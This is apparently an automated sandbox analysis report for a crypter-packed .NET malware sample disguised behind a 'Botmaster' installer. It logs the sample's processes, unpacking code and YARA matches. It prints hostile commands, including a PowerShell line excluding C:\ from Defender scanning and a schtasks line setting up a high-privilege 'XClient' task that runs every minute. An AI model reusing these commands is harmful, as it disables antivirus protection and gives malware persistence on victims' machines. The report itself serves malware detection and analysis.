                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeProcess created: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exe C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exeJump to behavior
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\WinUpdate.exe "C:\Users\user\AppData\Local\WinUpdate.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell set-mppreference -exclusionpath C:\
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe "C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exe"
                  Source: C:\Users\user\AppData\Local\WinUpdate.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -exclusionpath C:\
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=crashpad-handler --user-data-dir=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView\Crashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=117.0.5938.132 "--annotation=exe=C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --annotation=plat=Win64 "--annotation=prod=Edge WebView2" --annotation=ver=117.0.2045.47 --initial-client-data=0x15c,0x160,0x164,0x138,0x170,0x7ffdfb488e88,0x7ffdfb488e98,0x7ffdfb488ea8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=1736 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2196 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:3
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --mojo-platform-channel-handle=2488 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:8
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --first-renderer-process --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6386081770 --mojo-platform-channel-handle=3380 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6388632569 --mojo-platform-channel-handle=3928 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=renderer --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --disable-nacl --disable-gpu-compositing --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --js-flags="--harmony-weak-refs-with-cleanup-some --expose-gc --ms-user-locale=en_CH" --time-ticks-at-unix-epoch=-1710082776110454 --launch-time-ticks=6390330874 --mojo-platform-channel-handle=4280 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:1
                  Source: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exeProcess created: C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe "C:\Program Files (x86)\Microsoft\EdgeWebView\Application\117.0.2045.47\msedgewebview2.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --noerrdialogs --user-data-dir="C:\Users\user\AppData\Roaming\BotMaster\DefaultProfiles\EBWebView" --webview-exe-name=BotMaster.exe --webview-exe-version=5.8.0.1 --embedded-browser-webview=1 --embedded-browser-webview-dpi-awareness=0 --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4484 --field-trial-handle=1752,i,18154271516783547478,6264657338020236319,262144 --enable-features=MojoIpcz /prefetch:2
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: Next >
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeAutomated click: I accept the agreement
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeWindow detected: Number of UI elements: 17
                  Source: C:\Users\user\AppData\Local\Temp\Botmaster 5.8 direct.exeWindow detected: Number of UI elements: 17
                  Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic file information: File size 3511296 > 1048576
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x34dc00
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\webview2_api_writer\dotNetAPIWrapper\Microsoft.Web.WebView2.Core\bin\ReleasePackage\Microsoft.Web.WebView2.Core.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2196612181.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, BotMaster.exe, BotMaster.exe, 0000001A.00000002.3727126564.0000000006792000.00000002.00000001.01000000.00000010.sdmp
                  Source: Binary string: BotMaster.pdbPK source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053224069.00000000030AF000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000013.00000002.2489538224.0000000002B50000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2197563960.00000000042B6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\wpf_control\Microsoft.Web.WebView2.Wpf\obj\release\net45\Microsoft.Web.WebView2.Wpf.pdba source: Botmaster 5.8 direct.exe, 00000008.00000003.2197563960.00000000042B6000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\karim\Downloads\BotMaster5.8\Botmaster\obj\Debug\BotMaster.pdb source: BotMaster.exe, 0000001A.00000000.2266898531.0000000000FC6000.00000002.00000001.01000000.0000000D.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netfx\System.Memory.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2200775339.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2204364074.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: am Files (x86)\Bot Master\Bot Master\BotMaster.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2191011931.00000000009AA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: DotNetZip\obj\Release\DotNetZip.pdb source: aspnet_compiler.exe, 00000009.00000002.3705490557.0000000006CC0000.00000004.08000000.00040000.00000000.sdmp, aspnet_compiler.exe, 00000009.00000002.3681287686.0000000003B60000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Json/net461-Release/System.Text.Json.pdbSHA256 source: Botmaster 5.8 direct.exe, 00000008.00000003.2204364074.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2202463761.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: aspnet_compiler.pdb source: XClient.exe, 0000000C.00000000.2114700259.0000000000812000.00000002.00000001.01000000.0000000B.sdmp
                  Source: Binary string: E:\A\_work\39\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Numerics.Vectors/net46\System.Numerics.Vectors.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2201256888.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\a\_work\1\s\third_party\edge_webview2\win\winforms_control\Microsoft.Web.WebView2.WinForms\obj\release\net45\Microsoft.Web.WebView2.WinForms.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2197123799.00000000042B6000.00000004.00000020.00020000.00000000.sdmp, BotMaster.exe, BotMaster.exe, 0000001A.00000002.3724204302.0000000005B52000.00000002.00000001.01000000.0000000F.sdmp
                  Source: Binary string: protobuf-net.pdb source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, 00000000.00000002.2053102955.0000000002A70000.00000004.08000000.00040000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2159698585.0000000004738000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2353065439.0000000004109000.00000004.00000800.00020000.00000000.sdmp, WinUpdate.exe, 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: /_/artifacts/obj/System.Text.Encodings.Web/net461-Release/System.Text.Encodings.Web.pdbSHA256 source: Botmaster 5.8 direct.exe, 00000008.00000003.2202463761.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2191241194.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2194488233.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2193559861.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191596922.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197642159.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200134465.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2194002510.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2195584992.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197447745.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196317439.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2201712883.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196671374.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2197233269.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2196999002.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2202952523.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192256439.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2199029817.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2202241552.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192759324.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2201947621.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200600569.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2198445992.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191767847.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200817353.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2192584569.00000000009AA000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2191413727.00000000009AA000.00000004.00
                  Source: Binary string: am Files (x86)\Bot Master\Bot Master\BotMaster.pdbmanif source: Botmaster 5.8 direct.exe, 00000008.00000003.2191011931.00000000009AA000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: WebView2Loader.dll.pdb source: Botmaster 5.8 direct.exe, 00000008.00000003.2199738423.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2199389979.00000000042B1000.00000004.00000020.00020000.00000000.sdmp, Botmaster 5.8 direct.exe, 00000008.00000003.2200092245.00000000042B1000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: \??\C:\Program Files (x86)\Bot Master\Bot Master\BotMaster.pdb1> source: Botmaster 5.8 direct.exe, 00000008.00000002.2275007655.0000000000633000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256^Y source: Botmaster 5.8 direct.exe, 00000008.00000003.2198376301.00000000042B1000.00000004.00000020.00020000.00000000.sdmp

                  Data Obfuscation

                  barindex
                  .NET source code contains method to dynamically call methods (often used by packers)
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, dtUkAEdqlu9lYBqc0Yu.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                  .NET source code contains potential unpacker
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, RuleProcessorCandidate.cs.Net Code: CreateFacade System.AppDomain.Load(byte[])
                  Source: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe, PoolItem.cs.Net Code: FindCandidate System.Reflection.Assembly.Load(byte[])
                  Source: WinUpdate.exe.0.dr, RuleProcessorCandidate.cs.Net Code: CreateFacade System.AppDomain.Load(byte[])
                  Source: WinUpdate.exe.0.dr, PoolItem.cs.Net Code: FindCandidate System.Reflection.Assembly.Load(byte[])
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.3fe87f8.3.raw.unpack, Messages.cs.Net Code: kcbqqTgyeXJ2HJaKDtB System.AppDomain.Load(byte[])
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.2a70000.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.2a70000.0.raw.unpack, ListDecorator.cs.Net Code: Read
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.2a70000.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.2a70000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                  Source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.2a70000.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                  Yara detected Costura Assembly Loader
                  Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe.7da0000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 34.2.WinUpdate.exe.5b311ae.9.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 34.2.WinUpdate.exe.5b311ae.9.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 34.2.WinUpdate.exe.593118e.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000022.00000002.2346424155.0000000002CD6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2402369053.0000000005F49000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2346424155.0000000002CDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2077594079.0000000007E18000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2346424155.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2346424155.0000000002CBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2402369053.000000000587D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053224069.0000000002CB2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2053224069.0000000002CB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000013.00000002.2489538224.0000000002752000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000022.00000002.2346424155.0000000002CC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.2157680311.0000000003462000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.Win32.CrypterX-gen.12642.14495.exe PID: 7476, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WinUpdate.exe PID: 7632, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WinUpdate.exe PID: 7640, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: WinUpdate.exe PID: 1644, type: MEMORYSTR
